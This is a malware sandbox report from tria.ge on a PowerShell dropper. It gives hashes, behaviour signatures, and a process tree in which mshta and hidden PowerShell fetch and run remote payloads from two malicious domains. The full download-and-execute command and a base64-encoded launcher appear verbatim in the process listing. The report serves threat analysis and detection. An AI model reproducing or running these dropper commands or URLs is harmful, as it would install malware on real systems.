Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

run.ps1

windows7-x64

10

run.ps1

windows10-2004-x64

10

Analysis

  • max time kernel
    121s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    07/01/2025, 05:13

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    run.ps1

  • Size

    43B

  • MD5

    cefc1c3285ecac3a02ccbc8e0cebb558

  • SHA1

    7c2b049342ccd09474fcf8306c28c7d162c6d9b1

  • SHA256

    95cd2e94c29d862fd16c2cc19b0916784cf9ab2b93c7b9d816d34fe22ee239f7

  • SHA512

    b4a4dd60d8518e7629c6e5674d4cf185f7ce250f73dcfe110433d19933f2572bb814e54f234709a8d045f7c37a75298a36d537406c4002e4c0bb626c90eb22fc

Score
10/10
discoveryexecution

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

https://simplerwebs.space/anrek.mp4

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://klipdiheqoe.shop/ruwkl.png

Signatures

  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
    adwarespyware
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs

Processes

  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\run.ps1
    1⤵
    • Command and Scripting Interpreter: PowerShell
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2664
    • C:\Windows\system32\mshta.exe
      "C:\Windows\system32\mshta.exe" https://simplerwebs.space/anrek.mp4
      2⤵
      • Blocklisted process makes network request
      • Modifies Internet Explorer settings
      • Suspicious use of WriteProcessMemory
      PID:2320
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAFcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAiAC0AdwAgAGgAaQBkAGQAZQBuACAALQBlAHAAIABiAHkAcABhAHMAcwAgAC0AbgBvAHAAIAAtAEMAbwBtAG0AYQBuAGQAIABgACIAaQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AawBsAGkAcABkAGkAaABlAHEAbwBlAC4AcwBoAG8AcAAvAHIAdQB3AGsAbAAuAHAAbgBnACcAKQApAGAAIgAiACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgA=
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2612
        • C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://klipdiheqoe.shop/ruwkl.png'))"
          4⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2236

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    Filesize

    7KB

    MD5

    d96052d48c39db04f15080da4a021cb3

    SHA1

    8b4eadf3f34fb72c5ce5b4bef59d802f9da82643

    SHA256

    a3849801e555ee52569196f647d0cdbf8226bb3cc82e73feacb331224a6d43ec

    SHA512

    9fcbf404c3f152ac3d652411a0ca65840252470291cc8de9c503e31c0c78b970e7f14f251b01a31163392b73d01e87b73d62b8e502310097760f29a9b0063a83

    Download Submit

  • memory/2612-34-0x000000001B720000-0x000000001BA02000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2612-35-0x0000000002290000-0x0000000002298000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2664-4-0x000007FEF55EE000-0x000007FEF55EF000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2664-5-0x000000001B560000-0x000000001B842000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2664-6-0x00000000026D0000-0x00000000026D8000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2664-7-0x000007FEF5330000-0x000007FEF5CCD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2664-8-0x000007FEF5330000-0x000007FEF5CCD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2664-9-0x000007FEF5330000-0x000007FEF5CCD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2664-10-0x000007FEF5330000-0x000007FEF5CCD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2664-11-0x000007FEF5330000-0x000007FEF5CCD000-memory.dmp

    Filesize

    9.6MB

    Download